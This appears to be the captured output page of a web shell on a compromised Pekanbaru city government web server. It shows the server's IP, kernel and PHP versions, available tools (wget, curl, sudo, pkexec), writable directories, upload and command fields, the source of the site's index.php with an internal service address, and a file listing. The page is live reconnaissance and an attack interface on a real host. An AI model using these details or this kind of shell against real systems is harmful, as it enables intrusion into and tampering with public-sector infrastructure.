p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.217.108
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/dpmptsp/public_html/imb_bundel/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /home/dpmptsp/public_html/imb_bundel/index.php
<!DOCTYPE html>
<html>
<?php
date_default_timezone_set("Asia/Jakarta");
include ('../admin/part/db.php');
require_once '../tracking/curl/curl.php';
$ipPublik ='http://36.37.127.162:82/simpel2/';	
	$no=trim($_REQUEST['q']);	
		$length=strlen($no);
		if($length==32){
		$curl = new Curl();
		$curl->get($ipPublik.'index.php?act=Permohonan&task=client&find=arsip&id='.$no.'&html=0');					
		if ($curl->http_status_code == 200) {			
			$obj = json_decode($curl->response);
			if($obj->success){
				$error=false; 
				$ket='';
			}else{
				$error=true; 
				$ket='<div class="alert_message red" jQuery><p style="font-weight:700;"><i class="fa fa-ban"></i> MAAF! Data Tidak ditemukan di Server kami</p></div>
						<div style="width:100%;text-align:center;margin-top"-10%;">
							<image src="../images/404.gif" width="65%">
						</div>';
			}
			
			}else{
				$error=true; 
				$ket='<div class="alert_message red" jQuery><p style="font-weight:700;"><i class="fa fa-ban"></i> MAAF! Tidak ada Respon dari Server</p></div>
						<div style="width:100%;text-align:center;margin-top"-10%;">
							<image src="../images/giphy.gif" width="50%">
						</div>';
				}
		}else{
							$error=true; 
				$ket='<div class="alert_message red" jQuery><p style="font-weight:700;"><i class="fa fa-ban"></i> MAAF! Data Tidak ditemukan di Server kami</p></div>
						<div style="width:100%;text-align:center;margin-top"-10%;">
							<image src="../images/404.gif" width="65%">
						</div>';
		}
?>
<head>
    <title>DPMPTSP Kota Pekanbaru</title>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	<meta name="keywords" content="Dinas Penanaman Modal dan Pelayanan Terpadu Satu Pintu Kota Pekanbaru" />
	<meta name="description" content="Dinas Penanaman Modal dan Pelayanan Terpadu Satu Pintu Kota Pekanbaru">
	<meta name="author" content="DPMPTSP Kota Pekanbaru">
	<link rel="shortcut icon" type="image/x-icon" href="<?php echo PATH; ?>favicon.ico" />	
    <!-- Styles -->
    <link rel="stylesheet" href="<?php echo PATH; ?>css/normalize.css">
    <link rel="stylesheet" href="<?php echo PATH; ?>css/fontawesome.css">
    <link rel="stylesheet" href="<?php echo PATH; ?>css/colors.css">
    <link rel="stylesheet" href="<?php echo PATH; ?>css/typography.css">
    <link rel="stylesheet" href="<?php echo PATH; ?>css/style.css">
    <link rel="stylesheet" href="<?php echo PATH; ?>css/custom.css">

    <!-- Responsive -->
    <link rel="stylesheet" type="text/css" media="(max-width:768px)" href="<?php echo PATH; ?>css/responsive-0.css">
    <link rel="stylesheet" type="text/css" media="(min-width:769px) and (max-width:992px)" href="<?php echo PATH; ?>css/responsive-768.css">
    <link rel="stylesheet" type="text/css" media="(min-width:993px) and (max-width:1200px)" href="<?php echo PATH; ?>css/responsive-992.css">
    <link rel="stylesheet" type="text/css" media="(min-width:1201px)" href="<?php echo PATH; ?>css/responsive-1200.css">
    <link href='http://fonts.googleapis.com/css?family=Titillium+Web:300,300italic,400,400italic,700,700italic' rel='stylesheet' type='text/css'>	
</head>
<body>
    <!-- Wrapper -->
    <div id="wrapper" class="wide"> 
 <!-- Header -->
        <header id="header" role="banner">                
            <!-- Header main -->
            <div id="header_main" class="header_main">
                <div class="container">
                    <!-- Logo -->
                    <div class="site_brand" style="text-align:center;">
                           <img src="<?php echo PATH; ?>images/logo2.png" alt="Logo">
                     </div><!-- End Logo -->
                   <div style="text-align:center;">
				   <span style="font-size:16px;font-weight:600;">PEMERINTAH KOTA PEKANBARU</span><br>
				   <span  style="font-size:20px;font-weight:700;">DINAS PENANAMAN MODAL DAN PELAYANAN TERPADU SATU PINTU</span><br>
				   <span  style="font-size:12px;">Jalan Cut Nyak Dien No. 3 Telp. (0761)-28262 Fax. (0761)-42003 Pekanbaru 28126</span>
                   </div>
                </div>
            </div><!-- End Header main -->
        </header><!-- End Header -->	
			<!-- Section -->
            <section>
                <div class="container">
                    <div class="row">
                        <!-- Main content -->
                        <div class="col col_12_of_12">	
						<?php
						if($error){
							echo $ket;
						}else{
							if(!@include('page/arsip.php')){
								echo '
								<div class="alert_message red" jQuery><p style="font-weight:700;"><i class="fa fa-ban"></i> MAAF! Halaman Tidak ditemukan</p></div>
								<div style="width:100%;text-align:center;margin-top"-10%;">
								<image src="../images/giphy.gif" width="50%">
								</div>';
							}
						}
						?>
						</div><!-- End You might also like -->						
					</div><!-- End Main content -->	
				</div>
			</section><!-- End Section -->			
        <!-- Copyright -->
        <div id="copyright" role="contentinfo">
            <div class="container">
                <p>&copy; Dinas Penanaman Modal dan Pelayanan Terpadu Satu Pintu Kota Pekanbaru</p>
            </div>
        </div><!-- End Copyright -->
    </div><!-- End Wrapper -->
    
    <!-- Scripts -->
    <script type="text/javascript" src="<?php echo PATH; ?>js/jqueryscript.min.js"></script>
    <script type="text/javascript" src="<?php echo PATH; ?>js/jqueryuiscript.min.js"></script>
    <script type="text/javascript" src="<?php echo PATH; ?>js/easing.min.js"></script>        
    <script type="text/javascript" src="<?php echo PATH; ?>js/smoothscroll.min.js"></script>        
    <script type="text/javascript" src="<?php echo PATH; ?>js/magnific.min.js"></script>        
    <script type="text/javascript" src="<?php echo PATH; ?>js/bxslider.min.js"></script>        
    <script type="text/javascript" src="<?php echo PATH; ?>js/fitvids.min.js"></script>
    <script type="text/javascript" src="<?php echo PATH; ?>js/viewportchecker.min.js"></script>        
    <script type="text/javascript" src="<?php echo PATH; ?>js/init.js"></script>
</body>
</html>
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
January 03 2025 03:29:06
1000 / 1000
0755
page
--
December 21 2023 09:54:21
1000 / 1000
0755
index.php
6.125 KB
January 13 2024 08:50:14
1000 / 1000
0755